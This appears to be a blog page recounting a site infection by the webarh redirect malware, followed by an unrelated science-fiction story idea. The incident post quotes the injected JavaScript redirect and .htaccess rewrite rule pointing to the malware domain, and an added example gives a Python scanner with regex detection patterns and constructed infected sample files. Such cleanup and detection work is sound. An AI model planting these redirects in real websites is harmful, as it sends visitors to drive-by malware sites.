Webarh? More like Web Aargh!

Earlier this weekend I got a Facebook message from a friend saying that my website was redirecting to a malware site. Thankfully I was near a computer and had a look at it: every page view was redirecting to a site that installed malware on your computer. Thankfully most browsers recognise this fact and present you with a warning page.

I did some hunting and it turns out I had been infected with the webarh redirect virus (also referred to as funnysignage as it uses the same mode of attack). This virus has added the following line to any index.php files it found:

<script>
document.location.href='http://webarh.com/07628e5249a8b3459e49860dc9045837';
</script>

Note the numbers at the end are just a random identifier, probably so that they can tell where it originated.

And it had also gone through pretty much every directory either replacing or adding a .htaccess file with the following content:

RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://webarh.com/07628e5249a8b3459e49860dc9045837

For the non-tech-savvy, the first bit tells your web browser to redirect to (don’t go to that link, bad things will happen):

“http://webarh.com/07628e5249a8b3459e49860dc9045837”

The other tells my web server to send all requests for ANY PAGES to that same URL. It’s a two-pronged attack: if you have script blocking software on your browser, the .htaccess file makes the server send you to the malware site; if your server ignores the .htaccess file, then there is a chance that the script will work. Either way, when you end up at that URL no doubt the website tries to exploit whatever vulnerabilities exist in your browser to install bad software on your computer.

I diligently deleted all the .htaccess files and removed the script line from every file I could find it in. I did a grep for webarh.com over the entire website and removed any references to it I could find. I even changed the FTP password on my site because I read that sometimes that’s how webarh infects your server. It looked like all was good: for about 18 hours my site was back up and running and everything was hunky dory. At about midnight last night I got a text from someone else telling me my site was broken again. I checked and sure enough it was redirecting again, but only partially; some of the other domains I host in subdirectories of my web space were okay.
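Added example (not part of the original post): a scan that generalises the grep for webarh.com to any web root, flagging every .htaccess RewriteRule and every script location assignment that points at an absolute URL on a host outside an allow-list. The function names, the allow-list parameter and the sample tree with its malicious.example URL are constructed for illustration.

```python
import os
import re
import tempfile

# Constructed placeholder standing in for the injected redirect target.
SAMPLE_URL = "http://malicious.example/0123abcd"
# RewriteRule whose substitution is an absolute URL (the .htaccess prong).
HTACCESS_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://\S+)", re.I | re.M)
# Script assigning document.location / window.location to an absolute URL.
SCRIPT_RE = re.compile(r"(?:document|window)\.location(?:\.href)?\s*=\s*['\"](https?://[^'\"\s]+)", re.I)

def scan_tree(root, allowed_hosts=()):
    """Return sorted (relative_path, kind, url) for redirects leaving allowed_hosts."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name == ".htaccess":
                kind, pattern = "htaccess-rewrite", HTACCESS_RE
            elif name.lower().endswith((".php", ".html", ".htm", ".js")):
                kind, pattern = "script-redirect", SCRIPT_RE
            else:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="replace") as fh:
                text = fh.read()
            for url in pattern.findall(text):
                host = url.split("/")[2].lower()
                if host not in allowed_hosts:
                    findings.append((os.path.relpath(path, root), kind, url))
    return sorted(findings)

def build_sample_site(root):
    """Write a constructed tree: two infected files and two clean ones."""
    files = {
        "index.php": "<?php echo 'hi'; ?>\n<script>\ndocument.location.href='" + SAMPLE_URL + "';\n</script>\n",
        "blog/.htaccess": "RewriteEngine On\nRewriteBase /\nRewriteRule ^(.*)? " + SAMPLE_URL + "\n",
        "blog/index.php": "<?php require 'wp-blog-header.php';\n",
        "forum/.htaccess": "RewriteEngine On\nRewriteRule ^index\\.php$ - [L]\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        print("\n".join(map(str, scan_tree(site))))
```

Because it matches the redirect pattern rather than one domain name, a scan like this still flags a reinfection that uses a different target URL; it does not find PHP backdoors that carry no redirect.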

I’d heard that the webarh/funnysignage redirect sometimes puts back doors into your site. I didn’t have the time to look through every PHP file on my server, which hosts 4 WordPress installs and a phpBB install, so I took a deep breath and deleted everything… Most of my content was in the database; the only content that WordPress stores on disk is images and stuff you have uploaded. Of course I took a backup of the site beforehand just in case.

I’ve so far restored two of my WordPress blogs, and everything seems okay. I deleted an old version of phpMyAdmin I had lying about from before my service provider gave me direct access to the database. I’ve not deleted the phpBB install yet as that didn’t seem to be infected aside from the fact that the .htaccess file was causing everything to redirect to the malware site. So the next step would be to remove that too.

Fingers crossed it’s all looking good. If it happens again then I’m going to be a little more worried; either:

  • There is a backdoor in the SQL somewhere, then I’m really screwed.
  • There is a backdoor in phpBB, in which case I’ll have to reinstall that.
  • There is a virus on my computer which is picking up the FTP password and using it to wreak havoc on my website…

I’m hoping that none of the above apply… And that I’ll be safe from here on out. I think that the root cause of this was the fact that one of my sites didn’t have the latest version of WordPress installed on it; my reasoning behind this is that WordPress recently released a security update that allowed code to be executed etc… I’d updated my main site but had forgotten to update the others.

I’d appreciate anyone who notices any issues on my website getting in touch with me to tell me so.

Story Idea: The X Virus/The myth of man.

Inspired by this comic strip I started to think what would happen to society if a virus were to spread through humanity which broke our Y chromosomes? Within 3 generations there would be no men. We would probably figure out some way of reproduction; in fact we have the technology now.
Two or three hundred/thousand years down the line the existence of “Man” would be a myth. Everyone on the planet would be a lesbian because that’s the natural way of things. It reminds me a bit of the plot of Vandread except without the whole space war thing.
What would happen if suddenly a man reappeared? Either a baby boy was born (In a reverse Children of Men type plot) or an unknown indigenous tribe being discovered in some remote area?
How would this upset the status quo? Would people see this as the way of old, a novelty? Would heterosexualism be seen in the same light as homosexualism is/was? Could it be seen as an abomination?
Would specimens of men be kept in zoos and marveled at?
“Look at the odd arrangement of facial/body hair, they look like monkeys.”
Assuming that the virus hadn’t affected other animals, would humanity over time have rationalized their sexlessness as a sign that they were higher beings than animals?
“Animals have sex as humans we don’t need that. It’s bestial”
In a stereotypical science fiction universe a woman would start to have feelings for a man and nature would kick in; however, is that what would happen?
My guess is that the majority of womankind would be so disgusted with the thought that chances are that man would die unfulfilled? It does beg the question, are we programmed to know what sex is? I know other animals are, because they don’t communicate. Birds and bees don’t have to have a conversation about the birds and the bees, they just get on with it.
Is sex a genetic memory? If so can we “forget” that genetic memory?

This comic also from the same site might be considered relevant…